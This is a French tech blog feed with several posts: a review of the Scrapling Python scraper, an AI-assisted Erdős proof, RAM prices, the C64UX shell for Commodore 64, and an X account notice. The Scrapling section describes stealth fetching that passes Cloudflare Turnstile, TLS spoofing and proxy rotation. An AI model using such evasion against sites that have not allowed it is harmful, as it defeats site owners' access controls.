On résume chaque semaine tout le monde de la tech. Un podcast pour tous, compréhensible, intéressant et fun !

Scrapling - Le scraper Python qui se répare tout seul

Par : Korben ✨
28 avril 2026 à 08:53

Le scraping web, c'est un combat permanent contre les sites qui changent leur HTML toutes les deux semaines. Vous vous emmerdez à coder vos sélecteurs CSS, ça marche pendant un mois, puis le site refait son design et hop, votre script s'éteint en silence. C'est pourquoi Karim Shoair (alias D4Vinci sur GitHub) a sorti Scrapling, un framework Python qui s'adapte tout seul quand le DOM bouge.

La clé c'est adaptive=True sur n'importe quel sélecteur. Vous lui dites "je cherchais .product", Scrapling sauvegarde alors la signature de l'élément (texte, attributs, position dans l'arbre), et la prochaine fois que le site a renommé sa classe, il retrouve l'élément via similarité.

Concrètement ça donne ça :

from scrapling.fetchers import StealthyFetcher
StealthyFetcher.adaptive = True
page = StealthyFetcher.fetch('https://example.com', headless=True)
product = page.css_first('.product', adaptive=True) # Retrouve l'élément même si la classe a changé

Le truc marche grâce à un algo de similarité maison qui compare la structure DOM autour de l'élément. L'auteur lui-même a écrit un long post Medium intitulé " Creating self-healing spiders with Scrapling in Python without AI ", et ça résume bien la philosophie : pas de modèle IA mais juste des heuristiques solides !

La doc précise que adaptive=True ne sauvegarde que le premier élément de la sélection. Du coup si vous récupérez 50 produits d'un coup avec .css('.product'), seul le premier sera adapté. Faudra donc soit utiliser css_first comme dans l'exemple, soit boucler manuellement et appeler adaptive sur chaque élément. C'est bon à savoir...

Y'a également 3 fetchers selon le besoin. Fetcher pour les requêtes HTTP rapides avec spoofing TLS, StealthyFetcher qui passe Cloudflare Turnstile via un navigateur furtif (Camoufox sous le capot), et DynamicFetcher qui lance un Chromium ou un Chrome via Playwright pour les sites lourds en JS. Du coup vous pouvez démarrer léger en HTTP et basculer vers un navigateur uniquement quand un site bloque, sans réécrire votre code.

Côté perfs, le README annonce du lourd : 2 ms pour extraire 5000 éléments contre 1584 ms pour BeautifulSoup avec lxml. Sauf que Parsel et Scrapy font aussi 2 ms. Donc le gain vient du moteur lxml utilisé en direct, ce qui veut dire que si vous étiez déjà sur Scrapy, vous ne gagnerez pas en vitesse brute. Mais si vous traînez encore du BS4 partout, le saut sera énorme !

Sur le terrain anti-bot, ça se compare bien à Botasaurus dont je vous avais parlé. La différence c'est que Scrapling embarque un ProxyRotator natif et propose un blocage d'ads/trackers (~3500 domaines) activable via block_ads=True ou automatique en mode MCP, ce qui simplifie la vie quand vous tournez sur un serveur (où les IPs des datacenter se font régulièrement filtrer). Botasaurus, lui, vous laisse gérer la rotation à la main.

Détail sympa pour les bidouilleurs : y'a également un serveur MCP intégré (pip install "scrapling[ai]"). Du coup Claude ou Cursor peuvent piloter Scrapling directement pour extraire des données, en réduisant la consommation de tokens car l'IA ne voit pas tout le HTML brut, juste ce qui est extrait. Pour les agents qui scrappent en boucle, c'est cool.

Notez que les sponsors Platinum du projet sont tous des fournisseurs de proxies (DataImpulse, BirdProxies, Evomi, etc.). C'est logique vu l'usage du framework, mais gardez en tête que pour bypasser un Cloudflare sérieux à grande échelle, vous aurez besoin de proxies résidentiels payants, donc d'eux. L'outil est gratuit, mais le contournement industriel ne l'est pas.

Pour installer, c'est pip install "scrapling[fetchers]" puis scrapling install pour récupérer les binaires navigateur. Une image Docker existe aussi (pyd4vinci/scrapling) et y'a même un shell interactif (scrapling shell) pour debugger vos sélecteurs en live.

Bref, c'est carrément pas mal pour ceux qui scrapent régulièrement. Alors si BS4 vous fait pleurer, allez voir par ici .

Et merci à Letsar pour le lien !

Un amateur résout un problème d'Erdős vieux de 60 ans avec un seul prompt GPT-5.4

27 avril 2026 à 14:36

Liam Price, 23 ans, mathématicien amateur sans formation avancée, a résolu un problème d'Erdős resté ouvert depuis 60 ans en posant la question à GPT-5.4 Pro un lundi après-midi en avril.

Le modèle a tourné 80 minutes pour produire une preuve qui passe la validation du médaillé Fields Terence Tao. C'est ce que rapporte Joseph Howlett dans Scientific American.

Le problème en question, c'est l'Erdős #1196, posé par le mathématicien hongrois en 1965. L'IA n'a pas tout cassé en force brute. Elle a utilisé la fonction de von Mangoldt, un outil bien connu en théorie des nombres, mais que personne n'avait pensé à appliquer à ce type de question depuis 90 ans.

Tao parle d'une connexion jusqu'ici non décrite entre l'anatomie des entiers et la théorie des processus de Markov. En clair, l'IA a fait un pont entre deux branches mathématiques que les humains avaient laissé séparées.

La méthode est assez simple. Price a copié le problème dans une fenêtre ChatGPT, lancé GPT-5.4 Pro en mode raisonnement, et attendu. Pas de papier brouillon, pas d'allers-retours avec un professeur, pas de café à minuit avec des collègues. Un prompt, une réponse, et un objet mathématique sur lequel des experts du monde entier auront ensuite à se pencher pour valider chaque ligne.

Maintenant il faut savoir que la sortie brute de l'IA était plutôt confuse. Tao et Jared Lichtman, mathématicien à Oxford, ont dû relire, simplifier et reformuler la preuve pour qu'elle devienne lisible.

Sans expert humain pour décanter le résultat, le prompt seul n'aurait probablement pas convaincu une revue scientifique. L'IA a vu la bonne idée, mais pas vraiment su l'expliquer proprement.

Tao reste prudent. Il rappelle que le problème n'était pas le plus dur du livre des Erdős, et que l'IA a surtout gagné en vitesse, pas forcément en profondeur.

Lichtman, lui, parle du premier résultat IA au niveau du livre des Erdős, ce qui reste une marche assez impressionnante. Côté Liam Price, le jeune homme va probablement ajouter une ligne assez folle à son CV. Et le débat sur ce que ça veut dire pour la recherche en mathématiques pures, lui, est désormais lancé pour de bon.

Source : Scientific American

Pourquoi les prix de la RAM ne baissent pas

Par : Mr Xhark
27 avril 2026 à 08:00

Le prix de la mémoire vive est clairement partie en vrille depuis début 2026 et cela pourrait durer jusqu'en 2027, sinon plus. Mais quelle est la cause de cette pénurie : spéculation ou réelles problématiques d'approvisionnement ?

En attendant que les tarifs de vente de la mémoire vive baissent, évitons d'utiliser l'IA pour des âneries 😁 (blague à part, cela consomme de vraies ressources...!).

 

Vous n'aimez pas le RSS : abonnez-vous par email 📥
Vous devriez me suivre sur Twitter : @xhark

Article original écrit par Mr Xhark publié sur Blogmotion le 27/04/2026 | Pas de commentaire |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Cet article Pourquoi les prix de la RAM ne baissent pas provient de : on Blogmotion.

C64UX - Un shell Unix-like pour Commodore 64

Par : Korben ✨
24 avril 2026 à 09:23

Je viens de tomber sur un projet qui va vous renvoyer direct dans les années 80 !! Ça vous dirait que votre vieux Commodore 64 puisse balancer un prompt façon Unix, avec login, éditeur de texte et 30 commandes ? Hé bien c'est exactement ce que propose C64UX , codé en assembleur pur, sans patch ROM ni rien.

L'auteur, Anthony Scarola a sorti sa dernière version en février 2026, avec une bannière de démarrage qui balance fièrement des [ OK ] à chaque étape de la séquence de boot, exactement comme un vrai système Linux un peu trop fier de lui !

En gros sur votre Commodore 64 , vous bootez normalement sous BASIC puis vous lancez le programme c64ux.prg (un simple LOAD et RUN), vous tapez votre username et votre mot de passe, et hop, vous atterrissez dans un shell qui propose 30 commandes :

LS, CAT, NANO, RM, CP, MV, SAVE, LOAD, THEME, UPTIME, DRIVE, STAT, WRITE, ECHO, SAVEREU, LOADREU, WIPEREU, PASSWD, MEM, DATE, TIME, PWD, RESET, UNAME, VERSION, WHOAMI, CLEAR, DOS, EXIT et HELP.

Et la commande EXIT vous ramène à BASIC.

La config initiale de C64UX : création du compte, date et heure, avant de tomber sur le prompt

Sous le capot de C64UX, c'est de l'assembleur 6502 brut de décoffrage. Et surtout, le projet n'utilise que les routines standard du C64, sans aucune ROM modifiée, ni aucune cartouche spéciale. Du coup ça tourne aussi bien sur un vrai C64 d'époque que sur un Ultimate 64 moderne ou dans l' émulateur VICE .

Mais le vrai morceau de bravoure dans ce projet c'est la persistence REU. Car votre shell avec ses fichiers, vous pouvez le dumper dans l'extension mémoire de l'époque via SAVEREU puis tout restaurer après coup avec LOADREU. Très pratique pour ne pas perdre vos précieux textes à chaque reset ! Par contre, sans extension REU branchée, tout s'efface au redémarrage, faudra donc penser à taper la commande SAVE à la main pour écrire sur disquette.

La sortie de la commande HELP, avec la liste des commandes disponibles

L'éditeur baptisé NANO (inspiré du vrai mais en mode super minimaliste) fait bien le taf aussi. Et les themes changent la couleur de bordure, le fond et le texte d'un coup, entre NORMAL (le bleu royal classique), DARK, ou GREEN pour se la jouer Matrix.

Création d'un fichier avec WRITE, lecture avec CAT, puis STAT et LS pour voir les métadonnées

Sur le forum Lemon64, Scarola balance une nouvelle version à peu près toutes les semaines et reconnaît lui-même être un petit nouveau en assembleur. Mais gros respect pour avoir déjà sorti 10 releases en un peu plus d'un mois quand même ! Notez que comme tout bon développeur qui sait vivre avec son temps (#troll), il s'aide d'un peu d'IA (Claude Code en l'occurrence) pour l'écriture du code.

Voilà, si vous avez un Commodore 64 qui traîne ou juste un émulateur VICE sous la main, foncez tester, c'est sympa !

Suivez @blogmotion (X) pour être notifié des articles

Par : Mr Xhark
23 avril 2026 à 21:59

Pour continuer de suivre la publication de mes articles sur X (anciennement twitter) vous devez maintenant suivre @blogmotion qui est dédié à cet usage. Rien ne change pour mon compte @xhark qui reste mon compte principal et actif.

X a rendu son API payante, rendant impossible le relai des articles du blog sur X... et c'est bien dommage car vous êtes nombreux à découvrir mes articles par ce biais!

Alors ce n'est pas vraiment rendu payant pour tout le monde, mais tout le monde n'a pas les mêmes options visibles... bref merci Elon. Grâce à Antoine j'ai découvert buffer, qui permet de faire sensiblement la même chose gratuitement (jusqu'à quand ?) :

Ah ok ! Je passe par Buffer de mon côté

— Antoine Guilbert (@antoineguilbert) April 16, 2026

Vu les permissions abusives demandées par le service buffer, c'est la raison pour laquelle je préfère utiliser un compte secondaire.

Vous pouvez également être notifié des nouveaux articles en me suivant sur Mastodon et Blusky (facebook n'est plus mis à jour).

➡ Suivre @blogmotion (twitter)

Vous n'aimez pas le RSS : abonnez-vous par email 📥
Vous devriez me suivre sur Twitter : @xhark

Article original écrit par Mr Xhark publié sur Blogmotion le 23/04/2026 | Pas de commentaire |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Cet article Suivez @blogmotion (X) pour être notifié des articles provient de : on Blogmotion.
❌
❌